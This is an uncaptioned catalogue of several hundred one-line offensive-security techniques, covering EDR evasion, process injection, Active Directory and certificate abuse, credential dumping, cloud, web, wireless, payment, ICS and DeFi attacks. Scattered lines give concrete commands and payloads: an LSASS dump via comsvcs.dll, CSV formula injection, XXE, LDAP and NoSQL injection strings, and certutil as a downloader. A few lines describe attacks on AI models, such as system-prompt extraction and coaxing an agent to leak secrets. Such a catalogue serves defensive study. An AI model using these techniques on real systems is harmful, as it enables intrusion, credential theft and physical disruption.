Restore the original .text section of ntdll / kernel32 from disk to a freshly-loaded module — removes injected JMP hooks.

Patch EtwEventWrite / NtTraceEvent in process memory — telemetry blinded without admin.

Use a signed-but-vulnerable bootloader / shim (BlackLotus, BootHole) — chain into ring-0 before any OS protections initialise.

Pulse a laser at a decapsulated chip during cryptographic operation — induce fault that leaks the private key (DPA / DFA).

Briefly pull Vcc / inject clock pulse during a signature-check on a target chip — bypass bootloader / fuse-bit checks for firmware extraction.

Queue an asynchronous procedure call into a remote thread; runs attacker code at the first alertable wait — "early bird" variant before EDR injects.

Register a DLL-load callback in the target — fires every time the target loads a DLL, giving an injection moment with valid stack.

Use transacted file APIs to overlay attacker image during process creation — final image differs from on-disk file.

Create section from a delete-pending file — process exists with no on-disk file at all.

Modify a backing file's bytes after process create but before AV scan completes — defeats hash-on-launch checks.

Load a benign signed DLL into the target, then overwrite its .text in memory with attacker code — call stack still references the signed module.

Spawn a benign process suspended, unmap its image, write attacker PE in place, resume — classic SDV stealth primitive.

Manipulate the return-address chain so EDRs that walk the stack see a legitimate origin (kernel32!CreateProcessW etc.).

SuspendThread + SetThreadContext + ResumeThread to redirect EIP/RIP — classic injection, well-detected but still useful as a primitive.

Umbrella for any signed Microsoft binary used to launch attacker code — bypasses naive process-name-only allowlists.

Strip com.apple.quarantine xattr / use unsigned helper binaries / abuse SwiftSyntax-style trust gaps to run unsigned code without prompt.

Boot into recoveryOS, csrutil disable — full root with no kernel restrictions. Requires physical access on Apple Silicon.

Privacy framework gated by user consent — bypass via dyld injection, FDA-granted parent process, or CVE-class TCC.db edits before lock.

Decrypt IPA from a jailbroken device (Clutch / frida-ios-dump), patch Mach-O, resign with developer cert, sideload via TrollStore / AltStore.

Hook NSFileManager.fileExistsAtPath / canOpenURL: / sysctl — Liberty Lite / FlexDecrypt / Frida script bypasses fork() & dyld checks.

Patch / hook root-detection routines (SafetyNet / Play Integrity / custom checks) via Frida, RootBeer hooks, Magisk Zygisk modules.

Decompile APK with apktool, edit smali to flip checks or inject code, recompile + resign — bypasses root/jailbreak detection statically.

Hook OkHttp CertificatePinner / TrustManager / native pinning via Frida (objection / frida-tools), enabling MITM of the app's traffic.

Clone the MAC of an authenticated device (printer, IP phone, VoIP) — most 802.1x deployments allow MAC-Auth-Bypass for these.

Wrap payloads in 7z / RAR / ZIP / IMG / VHDX so on-prem AV can't unpack them; let user 'extract and double-click'.

Card claims fallback to magstripe-only; many terminals still allow it. Bypass EMV cryptography and reuse cloned magstripe data.

Hide artifacts via encoding, packing, or encryption.

Delete or modify logs and artifacts to hide activity.

Disable or evade defensive tools.

Stash a payload in an NTFS ADS (file:hidden) — invisible to most listings, executable via fully-qualified path.

UTF-7 / overlong UTF-8 / ASCII control-char encoding tricks the WAF parser but the application decodes the payload.

Frontend, backend, and WAF parse the request differently (URL normalization, HTTP body framing) — payload survives one parser, hits another.

Encoding (URL, double-URL, unicode), case randomisation, comment insertion, parameter pollution, chunked transfer, HTTP/2 fragments.

Diameter signaling between operators (or legacy SS7) lacks origin auth — query HSS for subscriber location / route SMS to attacker MSC.

Spoof a 2G/3G/LTE base station that downgrades nearby phones; capture IMSI, force-downgrade to 2G for MITM, intercept SMS / calls.

Smart-account social-recovery quorum mis-set / guardians compromised — attacker triggers recovery to attacker-controlled key.

AllExtendedRights on the domain object includes DS-Replication-Get-Changes / -All → DCSync.

Reset a user's password without knowing the old one — extended-right ACE.

Add a key credential to a target principal and authenticate via PKINIT to recover its NT hash.

Request a real TGT then patch its PAC in place — looks more legitimate than a Golden Ticket.

Decrypt Credential Manager blobs using the masterkey — recover saved RDP, browser, Outlook creds.

Extract DPAPI masterkeys (mimikatz dpapi::masterkey or via the domain backup key) to unseal vaults.

Vulnerable cert template allows the enrollee to supply an arbitrary subjectAltName, issuing a cert that authenticates as any user.

Weak StrongCertificateBindingEnforcement registry value lets implicit UPN mapping be abused.

Relay NTLM over RPC to ICertPassage (no signing), get a cert without web enrollment.

Cert template grants group membership claims; combined with ESC9/10 yields privileged auth.

Write altSecurityIdentities to map a cert subject to another user — pivot via UPN-mapped auth.

Schema v1 templates let the requester inject arbitrary EKUs / SANs into the cert.

Cert template with Any Purpose EKU can be enrolled and used for client authentication.

Abuse an enrollment-agent template to enroll on behalf of another user.

Modify a template's ACL to make it ESC1-vulnerable, then enroll as any user.

CA flag lets requesters supply a SAN in any request, bypassing template restrictions.

ManageCA / ManageCertificates rights on the CA allow approving rogue requests.

Relay NTLM auth to the CA's HTTP web-enrollment endpoint to obtain a cert as the coerced principal.

Cert template without security extension lets you authenticate as a different user via UPN mapping.

Extract a gMSA's blob via msDS-ManagedPasswordId/Data when ReadGMSAPassword right is held.

Decrypt cpassword from Groups.xml / ScheduledTasks.xml in SYSVOL using the published AES key.

Read ms-Mcs-AdmPwd (or msLAPS-Password) on a computer object you have READ rights to.

Extract MSCash2 hashes from SECURITY hive — domain creds cached for offline logon, crackable but slow.

Forge a TGT with valid PAC_REQUESTOR signature so it survives 2022 PAC validation patches.

Recover NAA credentials from the WMI policy class or client logs — often privileged.

Boot a PXE TFTP image and decrypt the embedded credentials / variable file.

From a cert-based PKINIT TGT, extract the user's NT hash via the PAC_CREDENTIAL_INFO field.

Enable UseLogonCredential to force LSASS to store plaintext passwords on next logon.

Vish the helpdesk for MFA factor reset against an admin user of the IdP (Okta / Entra) — register attacker factor, log in, push policy/factor changes.

Customer Snowflake tenants without enforced MFA / no IP allow-list — infostealer logs gave attackers credentials, leading to multi-tenant mass exfil (UNC5537).

Cookie set on .example.com is readable from any subdomain — combined with a controlled subdomain (XSS, takeover) it pivots to all sister apps.

Phishing site lures a victim to scan a QR linking their phone authenticator to the attacker's browser session — completes login on attacker hardware.

Access token returned in URL fragment — leaks via Referer, browser history, third-party scripts, postMessage.

Public client allows code flow without PKCE — capture the authorisation code (referrer / log leak) and exchange it.

Re-arrange the signed SAML response so the IdP-signed assertion stays intact while the SP parses an attacker-injected one — sign in as anyone.

ec2-instance-connect:SendSSHPublicKey lets a principal push an SSH key to any matching instance — 60-second window, SSH in.

Cloud Shell session writes a refresh token to /home/<user>/.azure on the underlying VM — exfil and reuse.

Hit 169.254.169.254/latest/meta-data/iam/security-credentials/<role> directly from a compromised process on the VM — IMDSv1 needs no token.

Even IMDSv2 leaks via SSRF when the instance's hop limit > 1 (default 1, but often raised for legacy CNI / containers).

GetSecretValue / KeyVault.GetSecrets / SecretManager.AccessSecretVersion — abuse over-permissive IAM to dump every secret.

Workflow inadvertently prints a secret (echo $SECRET, set -x, env dump) — public CI log exposes it.

Two signatures with the same nonce k under the same key trivially leak the private key (classic PS3 / Sony scenario).

MAC = H(secret || msg) (MD5 / SHA-1 / SHA-256 without HMAC) — append arbitrary data without knowing the secret using hashpump.

Two messages encrypted under the same key + nonce — XOR ciphertexts to recover keystream and forge new messages.

Server reveals padding-validity in error messages or timing — decrypt + forge any CBC-encrypted token (session cookies, viewstate).

Force the connection down to SSLv3 / EXPORT_RSA / DHE-512 — break crypto in real time, recover session keys.

Reset tokens / session IDs use Math.random / Mersenne Twister / time(NULL) — observe a few values, predict the rest.

OpenSSL TLS heartbeat over-read leaks adjacent memory — recover private keys, session cookies, plaintext credentials.

Misconfigured Autodiscover sends credentials to autodiscover.<TLD> as fallback — register that domain externally and harvest credentials.

MITM / phishing harvests OWA forms-based auth cookies — replay until session expires (default 8 hours).

Sniff the LPC / SPI bus while TPM unseals the BitLocker key (10 USD logic analyzer demos) — recover the FVEK, decrypt the disk offline.

Vendor-default web admin passwords on Epic / Cerner / GE imaging portals — every EHR/HL7 deployment audit finds at least one.

Cached SSO tokens for vSphere SSO / Azure Local / AWS Outposts on the hypervisor — broad pivot into the cloud control plane.

Measure cache-access timing to recover AES / RSA / ECC keys from co-resident processes — devastating in multi-tenant clouds and browsers.

Capture EM emanations or power-consumption traces near a target chip; correlation analysis recovers AES / RSA keys from smartcards / IoT chips.

Speculative execution leaks kernel / cross-process memory via cache-side-channels — useful in cloud (cross-tenant) and browser (cross-origin).

Sniff BLE pairing with Ubertooth / Sniffle / nRF52 — capture LTK / IRK on insecure (Just Works) pairing.

Clone the device's advertisement, MITM the central + peripheral; downgrade pairing security if possible.

Brute-force the 6-digit BLE passkey via crackle / btlejuice — works on Legacy Pairing in seconds.

Sniff the initial network-key broadcast (kept in plaintext on first join) — gain full network access to the smart-home estate.

Some tenants still allow EWS basic auth or app passwords — bypass MFA via legacy protocols.

Extract refresh tokens / FOCI tokens from a user's TokenCache.dat / WAM broker — replay against any Family Of Client IDs app.

security dump-keychain -d login.keychain — user prompts for each item, but ChainBreaker / LockSmith / Keychaindump scripts brute the master password.

Mainframe userIDs with predictable patterns and short / dictionary passwords — Kerberos / RACF TN3270 sessions are bruteforceable.

objection ios keychain dump — extract all kSecClassGenericPassword / kSecClassInternetPassword entries from the device.

On rooted devices, extract keys from /data/misc/keystore — or via Frida hooking KeyStore.load to capture material in memory.

bettercap / ettercap to interpose between two hosts on the same broadcast — captures cleartext + downgrades TLS where possible.

Win the DHCP race with shorter lease times — set yourself as the gateway and DNS resolver for new clients.

Spoof macOS / IoT name resolution — extends Responder's coverage beyond Windows LLMNR.

Windows prefers IPv6; advertise yourself as the IPv6 DNS server, relay authentication via wpadwpadwpad / NTLM.

Serve a wpad.dat that proxies every browser request through the attacker — credential capture + injection.

Many switches lack DHCPv6 Snooping equivalent — rogue DHCPv6 server still works even where DHCPv4 snooping is enforced.

OSPF area authentication uses keyed MD5 — capture an LSA exchange and brute the key offline; once cracked, inject any LSA.

Crypto-1 cipher broken in 2008 — attack the nonce reuse / key-recovery via mfoc / mfcuk; clones to a 'magic card' in seconds.

Reported side-channel against EV1 / EV2 (Nohl + Plotz 2011, recurring) — recovers AES key with chosen-plaintext + power analysis.

OTAA join procedure with weak AppKey / re-use of DevNonce — derive session keys, impersonate devices.

Government-mandated trust anchors used to MITM (DigiNotar 2011, TURKTRUST 2013, Symantec misissuance) — every CA error becomes everyone's problem.

Trusted root CA private key leak / compelled-signing — issue arbitrary leaf certificates, MITM any TLS without warnings.

Old ECC curves with known invalid-curve / twist attacks — forge signatures or recover private keys from a few signatures.

Configure the MFP to use attacker LDAP for address-book lookups — printer sends its bind credentials in cleartext (often a domain service account).

Point the printer's scan-to-SMB at an attacker host — NetNTLM credentials of the configured scan account hit the attacker, ready to relay.

Stripe / SendGrid / Datadog / PagerDuty tokens committed to repos or logged in CI — abuse for billing fraud, data exfil, account takeover.

GH PAT committed to a public / forked / Gist repo — full read/write to the user's repos, packages, deploy keys.

Slack xoxp / xoxb / xoxa tokens leaked in source, env files, CI logs — read history, post as user / app, exfil DMs.

Call helpdesk pretending to be the user, request password / MFA factor reset. Often paired with vishing scripts and partial PII.

Dump credentials from LSASS, SAM, ntds.dit, /etc/shadow.

Dump LSASS (mimikatz, procdump, comsvcs) to extract plaintext, NT hashes, and Kerberos tickets.

Dump local SAM/SYSTEM hives to recover local account hashes.

Extract NTDS.dit from a DC to recover every domain account hash, including krbtgt.

Abuse DRS GetNCChanges replication API (DS-Replication-Get-Changes-All) to pull credentials from a DC.

Passive capture of network traffic to extract credentials, tokens, configuration data — Wireshark, tcpdump, RTP / Modbus / Zigbee captures.

Guess credentials via repeated authentication attempts.

Try a small set of common passwords across many accounts to avoid lockout.

Replay credentials leaked from third-party breaches against domain auth.

Coerce a target (PetitPotam, PrinterBug, DFSCoerce) to authenticate to an attacker-controlled host.

Steal a session cookie (via XSS, MITM, cache poison) to take over an authenticated session without credentials.

Credentials stored or transmitted insecurely (in source, env files, cloud metadata, password stores).

Extract credentials from password managers, browsers, vaults.

Subvert auth — Skeleton Key, password filter DLLs, fake LDAP listeners, swapping cert / key material, SSO IdP tampering.

Position between two parties to intercept / modify / capture traffic — LLMNR, NTLM relay, MITM proxies, mitm6.

Spoof name resolution to coerce victims to authenticate, then relay or crack the captured NetNTLMv2.

Kerberoasting, Golden/Silver tickets, AS-REP roasting.

Forge a TGT using a stolen krbtgt hash to impersonate any principal in the domain.

Forge a service TGS using a stolen service-account hash to access a specific service.

Request TGS for accounts with SPNs and crack the RC4 ticket offline to recover the service-account password.

Request AS-REP for users with DONT_REQUIRE_PREAUTH and crack the returned blob offline.

Steal Kerberos credential cache files from a compromised host.

Bruteforce SIP extension passwords (often = extension number) — log in as the extension, place outbound calls.

NetScaler ADC / Gateway memory disclosure — recover authenticated session tokens from gateway memory.

Hydra / Burp Intruder against an unrate-limited login endpoint.

Vendor-shipped admin/admin, root/calvin, etc. on appliance UIs and installed apps (Tomcat manager, Jenkins, GLPI, …).

Spray a common password across enumerated usernames — sidesteps per-account lockout.

Replay credentials from third-party breach dumps against the target login.

Sequential / time-based / weakly hashed session IDs allow prediction or rotation of valid sessions.

=cmd|'/c calc'!A1 in exported CSV — fires when an analyst opens the file in Excel.

Sign an HS256 token using the server's public RSA key as the HMAC secret — server verifies it as RS256-compatible HMAC.

jku / x5u points to an attacker-controlled URL serving the public key matching your forged signature.

kid header used to load the verification key from disk / SQL — inject path traversal or SQLi to control the key.

Server accepts alg=none — forge any payload, strip signature, log in as anyone.

HS256 with a guessable / leaked secret — crack with hashcat -m 16500 and forge tokens.

rundll32.exe C:\windows\system32\comsvcs.dll MiniDump <pid> dump.dmp full — dump LSASS without Mimikatz signature.

Race conditions, brute-force OTP with no rate limit, downgrade auth flow, abuse of recovery / trusted-device flow.

Access token returned in the URL fragment — referrer / browser-history / window.location leaks let an attacker capture it.

Server accepts a wildcard / partial-match / open redirect-uri — steal the authorization code from the callback.

Login-CSRF on OAuth: attacker logs the victim into an attacker-controlled provider account.

Set the victim's session cookie before authentication; victim logs in, attacker rides the now-authenticated session.

Private key in a public repo, leaked .env, phished from a hot wallet — direct theft of every on-chain asset.

EIP-712 / personal_sign signature accepted across chains, contracts, or nonces — replay an off-chain signature to drain approved tokens.

Contract authenticates via tx.origin — a malicious contract the victim interacts with sees their tx.origin and impersonates them downstream.

Set up a rogue RADIUS to capture EAP-PEAP/MSCHAPv2 challenge-response from clients that don't validate the server cert — relay or crack.

RSN IE PMKID extracted from a single association attempt — no client needed, crack offline with hashcat -m 22000.

Deauth a connected client to force re-handshake, capture 4-way handshake, crack offline with hashcat -m 22000.

Side-channel / downgrade attacks on WPA3 SAE — recover password via cache-based attack on commit message.

Get a signature on a hash the victim can't preview — that signature later authorises an arbitrary transaction.

Fake MetaMask / Trust Wallet support page asks for 12-/24-word seed — usually delivered via Discord / Twitter / Google ads.

Collect AD objects, sessions, and ACLs to discover attack paths to high-value targets.

Authenticated SMB/LDAP/WinRM/MSSQL sweeps across the estate — module-driven enumeration.

Anonymous IPC$ session enables enumeration of users, shares, RID cycling.

Membership grants anonymous LDAP read of the domain partition.

Enumerate msDS-RevealedDSAs / msDS-RevealedList to find what credentials a RODC can disclose.

Collect AD data via Active Directory Web Services (port 9389) instead of LDAP — quieter, less flagged.

Coax the model into echoing its hidden system prompt via role-play / repetition / encoding tricks — reveals business logic, allowlists, secrets.

Tomcat AJP connector accepts unauthenticated file reads / includes — disclose WEB-INF/web.xml, often credentials.

dig @ns axfr <domain> succeeds — full DNS zone leaks every hostname, including unlinked dev/admin/staging.

Enumerate every binding to find can-i secrets, can-i pods/exec, can-i pods/create — finds escalation vectors.

Read /var/run/secrets/kubernetes.io/serviceaccount/token from a compromised pod — talk to the API server as the pod's SA.

Authenticated / unauthenticated TCP+UDP sweep against discovered subnets — finds web admin panels, MSSQL, exposed prints.

Find other hosts on the network.

Enumerate domain-joined hosts via LDAP / ADWS / SMB.

Enumerate groups and their members.

Enumerate files and directories on a compromised host — find sensitive files, SUID binaries, configs.

Enumerate local or domain accounts.

Enumerate domain users / groups via LDAP, net, ADModule, etc.

Map AD trusts and forest relationships.

Identify installed software / running services / kernel versions to pick the right post-exploitation primitive.

svmap / sipvicious / nmap sip-enum-users — discover SIP servers and enumerate valid extensions via OPTIONS / REGISTER responses.

*.sql / *.bak / index.php.bak / *.old served by the webserver — leak the database or the source code.

/actuator (Spring Boot), /trace, /heapdump, /debug, framework-default panels reachable in prod.

Source-control or dev files served by the webserver — .git lets you `git-dumper` the full repo, .env leaks all secrets.

Top-level resolver checks auth; nested fields don't — query around the check via aliasing / unions.

Batch hundreds of mutations in one request to bypass rate limits — login brute-force, OTP brute-force.

__schema query reveals every type, field, mutation — even in production where it should be disabled.

Mobile core GPRS Tunneling Protocol user-plane traffic often unfiltered between hops — inject packets into subscriber bearers; also useful for free-of-charge data tunnels.

Abuse msDS-AllowedToDelegateTo to impersonate any user to the configured service via S4U.

Authenticate as a DMSA — Windows Server 2025 successor to gMSA with new attack surface.

Insert SID History claims into a forged ticket to authenticate across a one-way or two-way trust.

Add a foreign principal (cross-forest SID) to a local domain group — bypass cross-trust filtering when misconfigured.

Hop across linked SQL servers via openquery / 4-part-naming — gain code execution on each link.

Write msDS-AllowedToActOnBehalfOfOtherIdentity on a target computer to S4U2self/S4U2proxy into it.

Direct MSSQL access to the site DB grants Full Administrator rights by inserting a row in RBAC_Admins.

Coerce a high-value account to authenticate to a server with unconstrained delegation and steal its TGT.

Hop across trust relationships (cross-account, cross-service) via STS — common when role trust policies are over-broad.

ssm:SendCommand / StartSession on a target instance — execute as root without touching SSH.

VirtualMachines/runCommand/action runs scripts as SYSTEM on the target VM — relies only on RBAC, not OS login.

Attacker-controlled DNS responds with short-TTL A records that flip from attacker IP to internal RFC1918 IPs — victim browser then talks to internal services via the attacker page.

Record a 'unlock' command sent over a non-authenticated BLE characteristic, replay it to open the smart lock / device.

Internet-facing router accepts UPnP IGD AddPortMapping from the LAN side without check — pivot to internal hosts via attacker-opened ports.

TCP/UDP tunnels over HTTP(S) when SSH is unavailable — chisel client to attacker, ligolo for L3 pivoting.

Wrap any TCP tool through a SOCKS5 tunnel — pivots impacket, nmap, etc. through a compromised host.

ssh -D / -R from a foothold to expose internal services through the attacker host — go-to pivot primitive.

Double-tagging / dynamic-trunk negotiation to send frames across VLAN boundaries — bypass network segmentation.

Announce a more-specific or origin-spoofed prefix from a compliant AS — global traffic for that prefix routes through attacker for inspection / drop.

Specific Visa + Express Transit config let attackers relay an active wallet from a victim's pocket to a payment terminal up to several thousand £ per tap.

Two devices proxy ISO/IEC 14443 frames between victim's contactless card and a real terminal — performs transactions without victim presence.

Compromise the engineering laptop (TIA Portal / Studio 5000) — push arbitrary logic to PLCs through legitimate channels.

Misconfigured firewall / shared AD / jump host lets a corporate-IT foothold reach the OT segment — typical lateral path in TRITON / INDUSTROYER cases.

POS network is flat; pivot from a payment-switch host into back-office systems — Target 2013 / Home Depot 2014 pattern.

Maritime / aviation SatCom modems (Cobham, Inmarsat) historically accept management commands without auth — change firmware, relay traffic, drop kernel implants.

Use RDP, SSH, SMB, WinRM, etc. to pivot.

Lateral movement via RDP using harvested credentials.

Use admin shares (ADMIN$, C$, IPC$) over SMB to execute on remote hosts.

Lateral movement via WinRM/PSRemoting.

Pass-the-hash, pass-the-ticket, application access tokens.

Authenticate to a remote service with an NT hash instead of a plaintext password.

Inject a stolen or forged Kerberos ticket into the current session for impersonation.

../../etc/passwd-style traversal in an include/require parameter — read source, configs, secrets.

Read arbitrary files via traversal in a file-serving endpoint (downloads, image proxies, PDF generators).

App fetches a URL controlled by the user — pivot to internal services unreachable from the internet.

No response shown — confirm via timing or DNS callback (Burp Collaborator, interactsh).

Hit 169.254.169.254 / 100.100.100.200 / metadata.google.internal — recover IAM role / instance creds.

Reach Redis (FLUSHALL / config rewrite), Elasticsearch, Kibana, Consul, Memcached — often unauthenticated internally.

External DTD with parameter entities exfiltrates file contents via a DNS / HTTP callback.

<!ENTITY xxe SYSTEM "file:///etc/passwd"> — included in the response or used to pivot.

Use SYSTEM "http://internal" entity to make the XML parser fetch internal URLs.

Crafted archive entry name contains ../ — extraction writes outside the target directory (overwrite cron, authorized_keys, webshell drop).

Force the agent to echo secrets into its trace / logging system; the observability backend is the actual exfil channel.

Query the target model at scale, train a substitute model on the outputs — replicates the IP at fraction of training cost.

Membership-inference / repetition prompts coax the model into emitting verbatim training data (PII, copyrighted text, code).

kms:Decrypt on grants intended for service consumers — decrypt arbitrary ciphertext, including snapshot keys / EBS volume keys.

CreateDBSnapshot then ModifyDBSnapshotAttribute to share to an attacker-owned account — clone DB outside victim tenancy.

ListObjects + GetObject loop across discovered buckets — straight data theft.

Vercel / Netlify / AWS Lambda function configured with NEXT_PUBLIC_ vars or via error message leaks env (Stripe key, DB url, GitHub PAT).

Cookies / tokens encrypted in ECB show repeated 16-byte blocks for repeated plaintext — recover plaintext via chosen-plaintext byte-at-a-time.

Postgres superuser COPY ... FROM PROGRAM runs shell commands — used when an SQLi yields superuser.

Most PACS / DICOM servers don't authenticate C-STORE/C-FIND on port 104/11112 — read or write medical images.

Pull firmware via UART / JTAG / SPI flash dump, or by intercepting an OTA update — extract filesystem + binaries for static analysis.

Use an OAuth-token to query EWS / Graph for entire mailboxes — bypasses many DLP that focus on Outlook clients.

Set an Outlook rule (or transport rule) to forward all mail to an external attacker mailbox — silent data exfil.

Open / anyone-with-link sharing leaves company files publicly indexable — recon via Bing / Grayhat Warfare.

adb backup -f data.ab → unpack with abe.jar — recovers app-private data when backupEnabled is unset (default true on old API levels).

Exported ContentProvider with insufficient grantUri checks — third-party app reads private data (auth tokens, PII, cached creds).

Apps with clipboard read access on iOS < 14 silently read every clipboard event — pre-2020 leak of OTPs, passwords, copied PII.

Specific OID writes trigger the device to TFTP its config to an attacker host — exfil interfaces, ACLs, AAA keys, RADIUS secret.

Overlay reader on an ATM / pump that captures magstripe data + tiny camera for PIN — classic deployed-skimmer kit.

Paper-thin shim sits between card and terminal contacts — captures chip data for partial replay attacks where downgrade is possible.

Windows-based POS terminal memory contains decrypted track-1/2 data briefly during transaction — scrape with kernel-mode or process-mem reads.

Spool to the printer goes over plaintext IPP / LPD — sniff or MITM and capture sensitive documents.

Pages 'shared with the web' get indexed by Google — internal docs, credentials, customer lists exposed via search.

Collect data from compromised hosts.

Collect data from network shares.

Capture user input — keylogging, GUI hooks, credential portals, captured network creds.

Stage data on a compromised host or intermediary before exfil — bundle, compress, encrypt for transport.

Sniff or MITM unencrypted RTP audio streams — pcap → Wireshark decodes to .wav; recover voicemail PINs, business intel.

Pull configs (saved usernames, RADIUS keys, LDAP binds, S2S PSKs) from a compromised appliance — credentials for further pivot.

*)(uid=*))(|(uid=* — bypass auth filters and enumerate the directory.

{"$ne": null} / {"$gt": ""} operator injection bypasses login or extracts data field by field.

Infer values one bit at a time via differential responses (page contents / status).

SLEEP / pg_sleep / WAITFOR DELAY — infer bits via response latency. Slowest but most universal.

Force DB error messages that leak query data (extractvalue, updatexml, double-cast).

DNS / HTTP exfil via xp_dirtree, LOAD_FILE(\\\\attacker), UTL_HTTP — useful when responses are filtered.

Append UNION SELECT to enumerate columns and exfiltrate arbitrary tables.

' or '1'='1 patterns against XPath-based auth — also enumerate the XML doc.

Tunnel C2 over DoH to a CDN-fronted resolver — bypasses many egress filters that allow HTTPS to common hosts but not raw UDP/53.

BITS jobs persist transfers across reboots and run as the service user — quiet exfil + download primitive.

Signed Windows binary used as a downloader (certutil -urlcache -split -f) or base64 decoder — slips past simple EDR.

Use HTTP(S), DNS, etc. for C2.

Tunnel C2 traffic through another protocol.

Encode exfil data into subdomain queries — works wherever recursive DNS is allowed out, often the last egress channel open.

Send data out through the C2 channel.

Send data to cloud storage or paste sites.

Broadcast forged GNSS signals near a target receiver — drift positioning, time, or simulate alternate routes (ship spoofing, drone fence bypass).

Crafted UserOperation that the bundler executes profitably for the attacker but drains gas / funds from the smart account / paymaster.

First-depositor inflation: attacker deposits 1 wei, transfers tokens directly to the vault to inflate share price, donations from later depositors get rounded to zero shares.

Paymaster sponsors gas without rate-limiting / per-user accounting — attacker spams UserOperations until the paymaster's deposit is empty.

LLM emits malicious markdown (data: URLs, image probes, JS) that fires when its output is rendered in a downstream UI (chat, ticket, email).

Extension's content script injects into all pages without proper isolation — buggy ext code becomes an XSS in every visited site.

Misconfigured page-rule / cache rule treats authenticated responses as cacheable — every visitor receives a previous user's response (or the attacker poisons it).

CF-Connecting-IP / Forwarded / Host headers honoured differently between edge + origin — bypass authorisation / steal cache state.

Construct a transaction that pays MEV-Boost validators directly to ensure ordering — pre-empts public mempool searchers.

Skew the collateral oracle to trigger self-liquidation at attacker-set prices — recover discount while keeping the position open.

Misconfigured vesting / streaming contract reverts on safety checks but transfers tokens anyway — net positive flow to attacker (real 2024 incidents).

Forge spoofed responses faster than the legit resolver — poison the cache so all clients of that resolver land on attacker IPs.

Spam NS-delegation chains that force the resolver to issue dozens of queries per attacker request — DDoS amplification primitive.

HL7 v2 messages are pipe-delimited cleartext — inject crafted segments into the unencrypted MLLP stream to alter lab results / orders.

Once root on ESXi, enumerate /vmfs/volumes and encrypt every .vmdk in place — single host outage takes down hundreds of VMs.

First Industroyer payload (2016) — IEC-101, IEC-104, IEC-61850, OPC DA modules — disable grid relays, wipe Windows controllers.

Ransomware that pre-kills industrial / SCADA processes (Honeywell HMIWeb, GE Proficy, Siemens) before encryption — designed for OT-adjacent IT.

Time-bombed payload speaks IEC-104 to substation RTUs at a precise hour, opens breakers across an entire grid section.

Modular toolkit (Tagrun, Codecall, Mousehole) speaks Modbus + OPC UA + CODESYS — generic 'pivot kit' for diverse PLC vendor estates.

Triconex Safety Instrumented System reachable on the OT network — push attacker logic that disables shutdown trips, opening physical-impact path.

addJavascriptInterface exposes Java methods to JS in WebView — XSS in WebView reaches the bridge and pivots to native code.

Multi-homed customer accidentally leaks transit routes — accidental but DoS-effective; useful as a deniable disruption primitive.

Misconfigured NTP daemon responds to monlist with hundreds of records — amplification factor for spoofed-source DDoS.

With cracked / no auth, inject Type-1 LSAs to manipulate the OSPF graph — blackhole, MITM, or DoS internal routing.

Set Terminal Transaction Qualifiers (TTQ) to claim CVM was performed — push transactions above the no-CVM limit.

Unauthenticated BACnet (UDP/47808) accepts WriteProperty / Reinitialise — switch HVAC, override alarms, brick controllers.

DNP3 deployments commonly run unauthenticated. Even where SAv5 is enabled, weak pre-shared keys or downgrade flaws are common.

Industroyer-class control of substation RTUs over IEC 60870-5-104 — open breakers, switch ground, denial of service to grid sections.

KNX/IP routers on UDP/3671 with no group-key — read sensor state and inject commands into lighting / blinds / access systems.

Devices that reset their frame counter on reboot allow attackers to replay sniffed up/downlinks — spoofed telemetry, denial of legitimate uplinks.

Modbus has no authentication. A reachable PLC accepts unauthenticated 'write single register' / 'write coils' — directly drive outputs / setpoints.

S7-300/400/1200/1500 PLCs respond to S7comm — read/write data blocks, stop/start CPU, transfer logic without auth (legacy) or with default password.

Modify SIS logic (e.g. Triconex) to disable shutdowns — TRITON's payload; enables physical damage paths.

Take over a CFO/AP mailbox or spoof a vendor domain; alter a pending invoice's wire-transfer details — funds redirect to attacker.

Delete / corrupt / brick data or systems — wiper-style malware, selfdestruct, irreversible deletes.

Ransomware-style encryption of victim data.

Delete shadow copies, disable recovery features.

Modify stored / in-transit data to influence outcomes — false records, altered transactions, falsified telemetry.

Compromised extension → make expensive international calls or configure call-forwarding to a premium number.

Workflow accepts states the designer never imagined — negative quantities, reordered steps, parameter tampering.

Append /style.css to /account — cache stores the authenticated response under a static-looking URL anyone can fetch.

Inject a payload via an unkeyed header (X-Forwarded-Host, X-Original-URL) — cache serves the poisoned response to everyone.

Frame the target inside an attacker page with opacity / overlay tricks — capture sensitive clicks.

Access-Control-Allow-Origin reflects arbitrary Origin with Allow-Credentials: true — cross-origin reads of authenticated data.

Inject \r\n into a header — split the response and inject your own headers or body, often leading to cache poisoning or XSS.

Force the victim's browser to issue a state-changing request — abuse of cookie auto-attach.

Log the victim into an attacker-controlled account — later transactions are recorded against the attacker's account, then back-channeled.

WebSocket handshake auth via cookies + no Origin check — attacker origin opens an authenticated WS to the target.

Inject HTML with name/id attributes that shadow JS globals — bypass sanitizers that trust DOM-derived config.

App generates password-reset link from request Host header — attacker reset link points at attacker domain.

Pollute Object.prototype in the browser — gadgets in 3rd-party libs turn it into DOM XSS.

Time-of-check / time-of-use — repeatedly invoke an operation between auth and effect (double-spend, simultaneous registration).

Bundle multiple HTTP/2 requests into a single TCP packet to hit the server within nanoseconds — bypass coupon limits, gift-card stacking, OTP brute.

Frontend honours Content-Length, backend honours Transfer-Encoding — smuggle a second request to bypass auth / poison.

H2 downgrade to H1.1 corrupts the framing — H2.CL, H2.TE, header CRLF injection variants.

Inverse: frontend uses TE, backend uses CL — same impact, different obfuscation.

Payload renders in a back-office context (CRM, support panel) you don't see — XSS Hunter / interactsh callbacks confirm.

Sink (innerHTML / location / eval) reads from a user-controlled source (location.hash, postMessage) without sanitization.

HTML parser re-serializes sanitized markup into an executable form — bypasses DOMPurify-style filters.

Payload echoed back in the response — phish a victim into clicking the malicious URL to fire JS in their session.

Payload persisted server-side and rendered for other users — passive collection of victims, often admin sessions.

Bridge's validator-set check is flawed (Ronin / Nomad / Wormhole class). Mint wrapped tokens on the destination chain without locking on the source.

Reentrancy across two different functions that share state — bypasses single-function nonReentrant guards.

Borrow uncollateralised capital atomically; use it to manipulate price oracles, drain liquidity, or vote on governance, repay in the same tx.

Submit a copy of a profitable mempool tx with a higher gas price — your tx mines first, you capture the value.

Pre-Solidity 0.8 arithmetic without SafeMath wraps around — token balances overflow to huge values, or underflow to 2**256-1.

Plant a transaction that looks like easy arbitrage; the searcher bot front-runs into a trap contract that steals its gas + funds.

Detect a victim swap in the mempool, front-run with buy, back-run with sell — profit from victim's price impact.

Marketplace contracts that don't enforce ERC-2981 royalties — wrap NFT transfers in attacker contracts to skip royalty payouts.

DeFi contract reads spot price from a single Uniswap pool — temporarily skew the pool with a large trade or flash loan, profit on the dependent contract.

